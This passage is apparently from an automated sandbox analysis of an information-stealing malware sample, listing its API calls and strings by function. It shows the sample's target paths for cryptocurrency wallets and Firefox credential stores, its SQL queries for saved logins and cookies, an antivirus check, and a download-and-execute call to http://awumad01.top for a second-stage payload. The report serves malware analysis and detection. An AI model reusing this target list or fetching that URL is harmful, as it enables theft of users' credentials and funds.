ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\AppData\Roaming\Jaxx,?,00000208), ref: 00417D2B
ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\AppData\Roaming\Exodus,?,00000208), ref: 00417D3E
ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\AppData\Roaming\MultiBitHD,?,00000208), ref: 00417D51
ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\Documents\Monero,?,00000208), ref: 00417D64
ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\AppData\Roaming\Exodus Eden,?,00000208), ref: 00417D77
ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\AppData\Roaming\Electrum\wallets,?,00000208), ref: 00417D8A
ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets,?,00000208), ref: 00417D9D
ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\AppData\Roaming\ElectronCash\wallets,?,00000208), ref: 00417DB0
ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\AppData\Roaming\com.liberty.jaxx,?,00000208), ref: 00417DC3
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Atomic,?,00000208), ref: 00417DD6
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\waves-client,?,00000208), ref: 00417DE9
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00417E2E
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00417F02
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00417FD6
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004180AA
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0041817E
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00418252
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00418326
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004183FA
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004184CE
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004185A2
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00418676
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00418805
GetFileAttributesW.KERNEL32(00000000), ref: 004188A6
GetFileAttributesW.KERNEL32(00000000), ref: 004188EC
GetFileAttributesW.KERNEL32(00000000), ref: 00418932
GetFileAttributesW.KERNEL32(00000000), ref: 00418978
GetFileAttributesW.KERNEL32(00000000), ref: 004189BE
GetFileAttributesW.KERNEL32(00000000), ref: 00418A04
GetFileAttributesW.KERNEL32(00000000), ref: 00418A4A
GetFileAttributesW.KERNEL32(00000000), ref: 00418A90
GetFileAttributesW.KERNEL32(00000000), ref: 00418AD6
GetFileAttributesW.KERNEL32(00000000), ref: 00418B1C
GetFileAttributesW.KERNEL32(00000000), ref: 00418B62

Strings

%APPDATA%\waves-client, xrefs: 00417DE4
Ph8L, xrefs: 00417DAA
%APPDATA%\Atomic, xrefs: 00417DD1
\files_\cryptocurrency\Exodus, xrefs: 00417ED4
\files_\cryptocurrency\Electrum-btcp, xrefs: 00417C34
\files_\cryptocurrency\Jaxx, xrefs: 00417E00
\files_\cryptocurrency\waves-client, xrefs: 00418648
\files_\cryptocurrency\com.liberty.jaxx, xrefs: 004184A0
PhL, xrefs: 0041779A
\files_\cryptocurrency\ElectronCash, xrefs: 00417B60
\files_\files\waves_exchange, xrefs: 004178B1
\files_\cryptocurrency\Atomic, xrefs: 00418574
PhpL, xrefs: 00417D84
%USERPROFILE%\AppData\Roaming\com.liberty.jaxx, xrefs: 00417DBE
%USERPROFILE%\AppData\Roaming\Electrum\wallets, xrefs: 00417D85
\files_\files\Ledger_Live_sqlite, xrefs: 00417985
%USERPROFILE%\AppData\Roaming\MultiBitHD, xrefs: 00417D4C
\files_\cryptocurrency\Electrum, xrefs: 00417A8C
Ph$L, xrefs: 00417DE3
\files_\cryptocurrency\MultiBitHD, xrefs: 00417FA8
PhL, xrefs: 00417D25
%LocalAppData%\Coinomi, xrefs: 0041779B
%USERPROFILE%\AppData\Roaming\Jaxx, xrefs: 00417D26
%USERPROFILE%\AppData\Roaming\Exodus, xrefs: 00417D39
PhLL, xrefs: 004177C0
%USERPROFILE%\Documents\Monero, xrefs: 00417D5F
%Temp%\, xrefs: 004177CD, 004178A1, 00417975, 00417A7C, 00417B50, 00417C24, 00417DF0, 00417EC4, 00417F98, 0041806C, 00418140, 00418214, 004182E8, 004183BC, 00418490, 00418564, 00418638, 004187C7
%AppData%\Ledger Live\sqlite, xrefs: 004177C1
UTC--2*, xrefs: 004176E5
%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets, xrefs: 00417D98
\files_\cryptocurrency\Monero, xrefs: 0041807C
%USERPROFILE%\AppData\Roaming\Exodus Eden, xrefs: 00417D72
31, xrefs: 004176F8
\files_\cryptocurrency\log.txt, xrefs: 004187D7
\files_\cryptocurrency\Electrum\wallets, xrefs: 00418224
\files_\cryptocurrency\Exodus Eden, xrefs: 00418150
Ph0L, xrefs: 00417D38
P, xrefs: 00418B35
0, xrefs: 0041773E
\files_\cryptocurrency\ElectronCash\wallets, xrefs: 004183CC
\files_\files\Coinomi, xrefs: 004177DD
%AppData%\waves-exchange, xrefs: 004177AE
%USERPROFILE%\AppData\Roaming\ElectronCash\wallets, xrefs: 00417DAB
\files_\cryptocurrency\Electrum-btcp\wallets, xrefs: 004182F8

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings$AttributesFile$CreateDirectory
String ID: %APPDATA%\Atomic$%APPDATA%\waves-client$%AppData%\Ledger Live\sqlite$%AppData%\waves-exchange$%LocalAppData%\Coinomi$%Temp%\$%USERPROFILE%\AppData\Roaming\ElectronCash\wallets$%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets$%USERPROFILE%\AppData\Roaming\Electrum\wallets$%USERPROFILE%\AppData\Roaming\Exodus$%USERPROFILE%\AppData\Roaming\Exodus Eden$%USERPROFILE%\AppData\Roaming\Jaxx$%USERPROFILE%\AppData\Roaming\MultiBitHD$%USERPROFILE%\AppData\Roaming\com.liberty.jaxx$%USERPROFILE%\Documents\Monero$Ph$L$Ph0L$Ph8L$PhLL$PhpL$PhL$PhL$P$UTC--2*$\files_\cryptocurrency\Atomic$\files_\cryptocurrency\ElectronCash$\files_\cryptocurrency\ElectronCash\wallets$\files_\cryptocurrency\Electrum$\files_\cryptocurrency\Electrum-btcp$\files_\cryptocurrency\Electrum-btcp\wallets$\files_\cryptocurrency\Electrum\wallets$\files_\cryptocurrency\Exodus$\files_\cryptocurrency\Exodus Eden$\files_\cryptocurrency\Jaxx$\files_\cryptocurrency\Monero$\files_\cryptocurrency\MultiBitHD$\files_\cryptocurrency\com.liberty.jaxx$\files_\cryptocurrency\log.txt$\files_\cryptocurrency\waves-client$\files_\files\Coinomi$\files_\files\Ledger_Live_sqlite$\files_\files\waves_exchange$31$0
API String ID: 1554190088-3108157970
Opcode ID: ed00aae71ac2db69dd5ee92365e5f881137e7b0225dda37f9946a646382d493f
Instruction ID: d7cd7cbcc3675ad1e5416100d6b729055f1bf428cde96432b8db1d40620ad8b9
Opcode Fuzzy Hash: ed00aae71ac2db69dd5ee92365e5f881137e7b0225dda37f9946a646382d493f
Instruction Fuzzy Hash: 15C22871A101089BDB08DB68DD89FDE7736AF85314F20866EE004A72D1DB7CABC5CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00409DF0, Relevance: 132.4, APIs: 35, Strings: 40, Instructions: 1172fileCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%AppData%\,?,00000208,?,75144770,?,00000000,004BFBA3,000000FF), ref: 00409E26
GetPrivateProfileStringW.KERNEL32 ref: 00409E6E
CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00409EFF
CloseHandle.KERNEL32(00000000), ref: 00409F11
CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00409F37
CloseHandle.KERNEL32(00000000), ref: 00409F43
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00409F8E
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040A062
CopyFileW.KERNEL32(?,?,00000000), ref: 0040A109
CopyFileW.KERNEL32(?,?,00000000), ref: 0040A11B

Part of subcall function 00409DF0: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00408FD8

Part of subcall function 00409DF0: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004093FA
Part of subcall function 00409DF0: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004094CE

Part of subcall function 00408BC0: GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000,7519FE60,?,7519F560), ref: 00408C09

GetFileAttributesW.KERNEL32(?), ref: 0040A187
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040A350
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040A424
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0040A501
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040A535
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040A562
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040A596
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0040A607
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040A63B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040A668
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040A69C
UnmapViewOfFile.KERNEL32(?), ref: 0040A6FA
CloseHandle.KERNEL32(00000007), ref: 0040A70E
CloseHandle.KERNEL32(00000000), ref: 0040A71C
GetFileAttributesW.KERNEL32(?), ref: 0040A741

Part of subcall function 00408960: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,?,00000000), ref: 00408B01

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040A84D
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040A927
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0040AA35
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040AA9B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040AAD0
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0040AB4F
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040AB7F
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040ABB5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0040ABEA

Strings

%AppData%\, xrefs: 00409E21
FALSE1830365600, xrefs: 00409920, 00409A4A, 00409B98, 00409CC2
\_Files\_AllPasswords_list.txt, xrefs: 0040A31C, 0040A819
\_Files\_Cookies\mozilla_firefox.txt, xrefs: 00409688
Url: %s, xrefs: 0040A4E1, 0040AA0D
Password: %s, xrefs: 0040A5A1, 0040A6A7, 0040AADB, 0040ABF5
Soft: Mozilla Firefox, xrefs: 0040A5D9, 0040AB19
logins, xrefs: 0040A1F9
%s --==> , xrefs: 0040929B
Browser: Mozilla Firefox, xrefs: 0040A4D3, 0040A9FF
\fehS8.tmp, xrefs: 00408FA4, 0040A034
%s\signons.sqlite, xrefs: 0040A13F
hostname, xrefs: 0040A252
%s -=> , xrefs: 00409310
Path, xrefs: 00409E64
%s\logins.json, xrefs: 0040A128
Profile0, xrefs: 00409E69
%wS\formhistory.sqlite, xrefs: 00409EBC
SELECT * FROM moz_cookies, xrefs: 00409651
%wS\Mozilla\Firefox\%wS, xrefs: 00409E91
%Temp%\, xrefs: 00408F94, 004090AC, 00409180, 004093B6, 00409490, 00409564, 00409678, 0040974C, 00409F4A, 0040A024, 0040A30C, 0040A3E6, 0040A806, 0040A8E3
SELECT * FROM moz_formhistory, xrefs: 00409087
%s, xrefs: 00409936, 004099C9, 00409A60, 00409BAE, 00409C41, 00409CD8, 00409D6B
Site: %s, xrefs: 0040A5E7, 0040AB27
encryptedUsername, xrefs: 0040A27D
%wS\Mozilla\Firefox\profiles.ini, xrefs: 00409E33
\files_\passwords.txt, xrefs: 0040A3F6, 0040A8F6
FALSE1630345132, xrefs: 004099B3, 00409AE1, 00409C2B, 00409D55
\files_\cookies.txt, xrefs: 004094A0
Username: %s, xrefs: 0040A540, 0040A646, 0040AA70, 0040AB8A
\files_\cookies\mozilla_firefox.txt, xrefs: 0040975C
%wS\cookies.sqlite, xrefs: 00409EAB
encryptedPassword, xrefs: 0040A2A3
TRUE, xrefs: 004098FC, 0040998F, 00409A26, 00409ABD, 00409B74, 00409C07, 00409C9E, 00409D31
SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins;, xrefs: 0040A772
\_Files\_AllCookies_list.txt, xrefs: 004093C6
\c5jmN.tmp, xrefs: 00409574, 00409F5A
%s, xrefs: 004092B4, 00409329, 00409945, 004099D8, 00409A6F, 00409BBD, 00409C50, 00409CE7, 00409D7A
\_Files\_AllForms_list.txt, xrefs: 004090BC
\files_\forms.txt, xrefs: 00409190

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$EnvironmentExpandStrings$File$CloseHandle$Attributes$CopyCreate$PrivateProfileStringUnmapView
String ID: FALSE1630345132$FALSE1830365600$TRUE$%AppData%\$%Temp%\$%s$%s$%s --==> $%s -=> $%s\logins.json$%s\signons.sqlite$%wS\Mozilla\Firefox\%wS$%wS\Mozilla\Firefox\profiles.ini$%wS\cookies.sqlite$%wS\formhistory.sqlite$Browser: Mozilla Firefox$Password: %s$Path$Profile0$SELECT * FROM moz_cookies$SELECT * FROM moz_formhistory$SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins;$Site: %s$Soft: Mozilla Firefox$Url: %s$Username: %s$\_Files\_AllCookies_list.txt$\_Files\_AllForms_list.txt$\_Files\_AllPasswords_list.txt$\_Files\_Cookies\mozilla_firefox.txt$\c5jmN.tmp$\fehS8.tmp$\files_\cookies.txt$\files_\cookies\mozilla_firefox.txt$\files_\forms.txt$\files_\passwords.txt$encryptedPassword$encryptedUsername$hostname$logins
API String ID: 73627701-1122011914
Opcode ID: 332c88b1fa963631e4ebc83fbbba5e3b74fd93785e86f47b020b8ab6a96e5604
Instruction ID: baa17ad22e06561859982a4870c92d23210183e074c8bcff8799119844805004
Opcode Fuzzy Hash: 332c88b1fa963631e4ebc83fbbba5e3b74fd93785e86f47b020b8ab6a96e5604
Instruction Fuzzy Hash: E1824671E00304ABEB20EB64CC86FAF7375AB45714F14423AF504BB2D2D77CA9518B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00414650, Relevance: 128.6, APIs: 37, Strings: 36, Instructions: 805COMMON

Download Yara Rule

Strings

%APPDATA%\waves-client, xrefs: 00415974
\_Files\_Wallet\ElectronCash\wallets, xrefs: 00415F5C
%APPDATA%\Atomic, xrefs: 00415961
\_Files\_Wallet\Monero, xrefs: 00415C0C
\_Files\_Wallet\Exodus Eden, xrefs: 00415CE0
%USERPROFILE%, xrefs: 004151A9
%USERPROFILE%\AppData\Roaming\com.liberty.jaxx, xrefs: 0041594E
%USERPROFILE%\AppData\Roaming\Electrum\wallets, xrefs: 00415915
%USERPROFILE%\AppData\Roaming\MultiBitHD, xrefs: 004158DC
\_Files\_Files, xrefs: 00415042
\_Files\_Wallet\Electrum, xrefs: 0041561C
%LocalAppData%\Coinomi, xrefs: 0041532B
%USERPROFILE%\AppData\Roaming\Jaxx, xrefs: 004158B6
%USERPROFILE%\AppData\Roaming\Exodus, xrefs: 004158C9
\_Files\_Files\Coinomi, xrefs: 0041536D
\_Files\_Wallet\Jaxx, xrefs: 00415990
\_Files\_Wallet\Exodus, xrefs: 00415A64
%USERPROFILE%\Documents\Monero, xrefs: 004158EF
%Temp%\, xrefs: 00415032, 0041535D, 00415431, 00415505, 0041560C, 004156E0, 004157B4, 00415980, 00415A54, 00415B28, 00415BFC, 00415CD0, 00415DA4, 00415E78, 00415F4C, 00416020
%AppData%\Ledger Live\sqlite, xrefs: 00415351
UTC--2*, xrefs: 00415275
%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets, xrefs: 00415928
%USERPROFILE%\AppData\Roaming\Exodus Eden, xrefs: 00415902
%USERPROFILE%\Desktop\*.txt, xrefs: 00415026
\_Files\_Wallet\ElectronCash, xrefs: 004156F0
\_Files\_Wallet\Electrum-btcp\wallets, xrefs: 00415E88
\_Files\_Files\waves_exchange, xrefs: 00415441
\_Files\_Wallet\Electrum-btcp, xrefs: 004157C4
*.*, xrefs: 00414CC5
wallet.dat, xrefs: 004151BB
\_Files\_Wallet\MultiBitHD, xrefs: 00415B38
\_Files\_Wallet\Electrum\wallets, xrefs: 00415DB4
\_Files\_Files\Ledger_Live_sqlite, xrefs: 00415515
%AppData%\waves-exchange, xrefs: 0041533E
%USERPROFILE%\AppData\Roaming\ElectronCash\wallets, xrefs: 0041593B
\_Files\_Wallet\com.liberty.jaxx, xrefs: 00416030

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %APPDATA%\Atomic$%APPDATA%\waves-client$%AppData%\Ledger Live\sqlite$%AppData%\waves-exchange$%LocalAppData%\Coinomi$%Temp%\$%USERPROFILE%$%USERPROFILE%\AppData\Roaming\ElectronCash\wallets$%USERPROFILE%\AppData\Roaming\Electrum-btcp\wallets$%USERPROFILE%\AppData\Roaming\Electrum\wallets$%USERPROFILE%\AppData\Roaming\Exodus$%USERPROFILE%\AppData\Roaming\Exodus Eden$%USERPROFILE%\AppData\Roaming\Jaxx$%USERPROFILE%\AppData\Roaming\MultiBitHD$%USERPROFILE%\AppData\Roaming\com.liberty.jaxx$%USERPROFILE%\Desktop\*.txt$%USERPROFILE%\Documents\Monero$*.*$UTC--2*$\_Files\_Files$\_Files\_Files\Coinomi$\_Files\_Files\Ledger_Live_sqlite$\_Files\_Files\waves_exchange$\_Files\_Wallet\ElectronCash$\_Files\_Wallet\ElectronCash\wallets$\_Files\_Wallet\Electrum$\_Files\_Wallet\Electrum-btcp$\_Files\_Wallet\Electrum-btcp\wallets$\_Files\_Wallet\Electrum\wallets$\_Files\_Wallet\Exodus$\_Files\_Wallet\Exodus Eden$\_Files\_Wallet\Jaxx$\_Files\_Wallet\Monero$\_Files\_Wallet\MultiBitHD$\_Files\_Wallet\com.liberty.jaxx$wallet.dat
API String ID: 0-412220459
Opcode ID: d22dc9fa4f9d0fc06209f29fa0cc3ae4050001ed51c5048cdc2f1e70244ec68b
Instruction ID: f34e8bd6197c09e9207dc8f2743730a88d323aa93d071eb878fef5f626035541
Opcode Fuzzy Hash: d22dc9fa4f9d0fc06209f29fa0cc3ae4050001ed51c5048cdc2f1e70244ec68b
Instruction Fuzzy Hash: 4862E074A10208DADB04DF94DD89FDFB7B5EF85304F60816ED404A72D0E778AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C561, Relevance: 77.3, APIs: 31, Strings: 13, Instructions: 306sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040C595

Part of subcall function 0041A280: ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\AVG,?,00000208,75146490,00000000), ref: 0041A2B8
Part of subcall function 0041A280: GetFileAttributesW.KERNEL32(00000000), ref: 0041A2D7
Part of subcall function 0041A280: Sleep.KERNEL32 ref: 0041A319
Part of subcall function 0041A280: ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\AVAST Software,00000208,00000208), ref: 0041A32C
Part of subcall function 0041A280: GetFileAttributesW.KERNEL32(00000000), ref: 0041A33F
Part of subcall function 0041A280: Sleep.KERNEL32 ref: 0041A381
Part of subcall function 0041A280: GetSystemInfo.KERNEL32(?), ref: 0041A38A
Part of subcall function 0041A280: KiUserCallbackDispatcher.NTDLL(00000000), ref: 0041A39F
Part of subcall function 0041A280: GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A3C4

ExpandEnvironmentStringsW.KERNEL32(%AppData%\Satir,?,00000208), ref: 0040C5B1
GetFileAttributesW.KERNEL32(00000000), ref: 0040C5C0
ExitProcess.KERNEL32 ref: 0040C5D9
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040C5EC
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0040C619
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0040C662
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0040C6B4
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0040C706
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0040C758
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040C776
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040C782
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040C78E
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040C79A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040C7A6
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0040C7E6
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0040C838
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0040C88A
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0040C8DC
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040C8FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040C906
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040C912
CreateDirectoryW.KERNEL32(?,00000000), ref: 0040C91E
Sleep.KERNEL32(00000000), ref: 0040C953
ExpandEnvironmentStringsW.KERNEL32(%Temp%\Murano.exe,?,00000208), ref: 0040C967
DeleteFileW.KERNEL32(?), ref: 0040C971
Sleep.KERNEL32(00000000), ref: 0040C987
URLDownloadToFileW.URLMON(00000000,http://awumad01.top/download.php?file=lv.exe,?,00000000,00000000), ref: 0040C99C
Sleep.KERNEL32(00000000), ref: 0040C9B2
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040C9C9
ExitProcess.KERNEL32 ref: 0040C9D6

Part of subcall function 00413DF0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00413E1C
Part of subcall function 00413DF0: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000208), ref: 00413E33
Part of subcall function 00413DF0: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00413EA1

Strings

\_Files\_Cookies, xrefs: 0040C85E
%Temp%\, xrefs: 0040C5FA, 0040C630, 0040C682, 0040C6D4, 0040C726, 0040C7B4, 0040C806, 0040C858, 0040C8AA
\files_\files, xrefs: 0040C688
\_Files, xrefs: 0040C7BA
open, xrefs: 0040C9C2
%AppData%\Satir, xrefs: 0040C5AC
\_Files\_Wallet, xrefs: 0040C8B0
\files_\cookies, xrefs: 0040C6DA
\files_\cryptocurrency, xrefs: 0040C72C
\_Files\_Files, xrefs: 0040C80C
%Temp%\Murano.exe, xrefs: 0040C962
http://awumad01.top/download.php?file=lv.exe, xrefs: 0040C995
\files_, xrefs: 0040C636

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings$CreateDirectory$FileSleep$Attributes$ExitProcess$CallbackDeleteDispatcherDownloadExecuteGlobalInfoMemoryModuleNameShellStatusSystemUser
String ID: %AppData%\Satir$%Temp%\$%Temp%\Murano.exe$\_Files$\_Files\_Cookies$\_Files\_Files$\_Files\_Wallet$\files_$\files_\cookies$\files_\cryptocurrency$\files_\files$http://awumad01.top/download.php?file=lv.exe$open
API String ID: 3996554294-1290209954
Opcode ID: e5d49e947a2e13b2790d30253155ea41b5cad6c2fa5e8b624a4b74176da41a9a
Instruction ID: 4ddfbbca0d1cc3ea5a8e2312b6ea44a644205a82301e5b35c61a5ccd1480c18e
Opcode Fuzzy Hash: e5d49e947a2e13b2790d30253155ea41b5cad6c2fa5e8b624a4b74176da41a9a
Instruction Fuzzy Hash: E3A1C3B5A1430466D650F771DC5AF9F36A8EF84308F80093EB546A31D2EE7CE508CE6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041609C, Relevance: 65.4, APIs: 20, Strings: 17, Instructions: 682COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000), ref: 00416436
GetFileAttributesW.KERNEL32(00000000), ref: 0041647C
GetFileAttributesW.KERNEL32(00000000), ref: 004164C2
GetFileAttributesW.KERNEL32(00000000), ref: 00416508
GetFileAttributesW.KERNEL32(00000000), ref: 0041654E
GetFileAttributesW.KERNEL32(00000000), ref: 00416594
GetFileAttributesW.KERNEL32(00000000), ref: 004165DA
GetFileAttributesW.KERNEL32(00000000), ref: 00416620
GetFileAttributesW.KERNEL32(00000000), ref: 00416666
GetFileAttributesW.KERNEL32(00000000), ref: 004166AC
GetFileAttributesW.KERNEL32(00000000), ref: 004166F2
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00416822

Strings

jjjj, xrefs: 00416A5D
DisplayName, xrefs: 004169E1
\_Files\_Wallet\_log.txt, xrefs: 00416367
PhXL, xrefs: 00416A38
|3, xrefs: 00416796
DisplayVersion, xrefs: 00416A20
%Temp%\, xrefs: 004160F4, 004161C8, 00416357, 004167DE
0Tu, xrefs: 004169E9, 00416A28
\_Files\_Wallet\Atomic, xrefs: 00416104
[ %wS ], xrefs: 00416A39
\_Files\_Information.txt, xrefs: 004167F4
a+,ccs=UTF-16LE, xrefs: 0041698E
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00416946
\_Files\_Wallet\waves-client, xrefs: 004161D8
w3, xrefs: 0041679B
PhLL, xrefs: 004169F9
%wS , xrefs: 004169FA

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile$EnvironmentExpandStrings
String ID: [ %wS ]$%Temp%\$%wS $0Tu$DisplayName$DisplayVersion$PhLL$PhXL$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$\_Files\_Information.txt$\_Files\_Wallet\Atomic$\_Files\_Wallet\_log.txt$\_Files\_Wallet\waves-client$a+,ccs=UTF-16LE$jjjj$w3$|3
API String ID: 2644751379-3266951277
Opcode ID: 535f9037e5a940d206950546c2d9b058c780281ab7f112130c5fda991023da37
Instruction ID: 4d4596c2a8d4f7b3dd4bea5f9b5e517105c893fb4055a33e11ac38ff9b31392a
Opcode Fuzzy Hash: 535f9037e5a940d206950546c2d9b058c780281ab7f112130c5fda991023da37
Instruction Fuzzy Hash: 14320571A00218ABDB14EB65DC85FDE7379BF45308F11466AF404A32D1EB7CEAC58B68

Uniqueness

Uniqueness Score: -1.00%

Function 00418C20, Relevance: 56.3, APIs: 22, Strings: 10, Instructions: 276COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00418C9E

Strings

a+,ccs=UTF-16LE, xrefs: 00417012, 00418D54, 00418EE8, 00418F7D, 00418FB5, 00419036, 00419146, 004191C3, 00419547, 004196ED, 00419774, 004197AC, 00419828, 00419932, 004199AF, 00419AF3, 00419B72
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00419238, 00419A24
%WINDIR%\SysWOW64, xrefs: 00418EAC, 0041969F
%Temp%\, xrefs: 00416F43, 004174A2, 00418C5D, 0041944D
Local Date and Time: %Y-%m-%d %X, xrefs: 0041910D
0Tu, xrefs: 00418DC0, 00419244, 004195B3, 00419A30
\files_\system_info.txt, xrefs: 00418C70
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00418DB4, 00418E14, 00418E6E, 004195A7, 00419607, 00419661
UTC: %z, xrefs: 0041912A
SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, xrefs: 004192BC, 00419AA8

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: Local Date and Time: %Y-%m-%d %X$%Temp%\$%WINDIR%\SysWOW64$0Tu$HARDWARE\DESCRIPTION\System\CentralProcessor\0$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000$UTC: %z$\files_\system_info.txt$a+,ccs=UTF-16LE
API String ID: 237503144-4080060983
